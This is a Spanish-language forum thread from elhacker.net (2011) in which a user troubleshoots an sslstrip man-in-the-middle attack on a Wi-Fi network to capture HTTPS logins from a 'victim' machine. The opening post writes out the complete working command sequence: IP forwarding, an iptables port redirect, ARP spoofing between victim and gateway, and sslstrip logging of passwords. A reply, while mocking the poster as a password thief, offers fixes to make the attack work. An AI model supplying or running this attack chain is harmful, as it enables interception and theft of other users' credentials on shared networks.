elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
29 Mayo 2012, 06:42  


Tema destacado: Únete al Grupo Steam elhacker.NET

+  Foro de elhacker.net
|-+  Comunicaciones
| |-+  Redes (Moderador: madpitbull_99)
| | |-+  sslstrip & backtrack 5: No entra en la pagina		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: sslstrip & backtrack 5: No entra en la pagina  (Leído 2,112 veces)
Gambino_88

Desconectado Desconectado

Mensajes: 1


Ver Perfil
sslstrip & backtrack 5: No entra en la pagina
« en: 15 Junio 2011, 22:04 »
Estoy utilizando Backtrack 5 para intentar snifar el trafico https de mi red wifi.

Tras realizar el ataque cuando entro a una pagina https desde el ordenador victima, me he fijado que si se ha eliminado el ssl (La pagina es http en vez de https, hasta ahi todo perfecto)

Pero cuando introduzco mi user y contraseña para hacer login, al aceptar me vuelve a dirigir a la pagina del login, como que los el user y password fuesen incorrectos.

Al mirar el archivo sslstrip.log veo que las contraseñas han quedado guardadas, como que todo hubiera ido normal.

Los comandos que utilizo son estos:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1    (siendo la 1era la victima y la 2a el gateway, aunque lo he probado tambien del reves)

cd /pentest/web/sslstrip
python sslstrip.py -l 8080

Y despues abro el archivo sslstrip.log


Alguien me puede echar una mano?
Gracias de antemano.
En línea
whiteN0ise

Desconectado Desconectado

Mensajes: 209


Ver Perfil
Re: sslstrip & backtrack 5: No entra en la pagina
« Respuesta #1 en: 17 Junio 2011, 17:09 »
Si eres del 88 estas muy chavo para hacer carrera profesional de "roba-passwords-de-hotmail", eso dejaselo a egresados de Palito y Bolita II. Supongo que te leiste con gran felicidad el tuto que hizo sozemu y te fijarias que hay que actualizar a la ultima version de sslstrip. Ademas puede ser que el usuario del que obtuviste pass este logeado. No quiero creer en la posibilidad de que alguien en la red local te pueda estar pagando con la misma moneda haciendo forwarding a tus paquetes y presentandote un documento de login apocrifo. xDD

Un saludo
« Última modificación: 17 Junio 2011, 17:11 por int_0x40 » En línea
"When two trains approach each other at a crossing, both shall come to a full stop and neither shall start up again until the other has gone. ”
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemas Sslstrip « 1 2 »
Hacking Linux/Unix 		gerard_88 16 8,830 Último mensaje 10 Mayo 2011, 12:14
por joinko
Problema con el sslstrip
GNU/Linux 		chatarrero 2 925 Último mensaje 24 Diciembre 2009, 14:27
por chatarrero
sslstrip en windows
Redes 		NikNitro! 2 3,997 Último mensaje 28 Enero 2011, 12:00
por madpitbull_99
Instalar SSLStrip 0.9 en Backtrack 5 R1 (Resuelto)
Hacking Avanzado 		alpha015 1 2,142 Último mensaje 13 Septiembre 2011, 10:55
por alpha015
Pagina de tools backtrack?
GNU/Linux 		puntoinfinito 5 101 Último mensaje 24 Mayo 2012, 23:16
por portaro
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines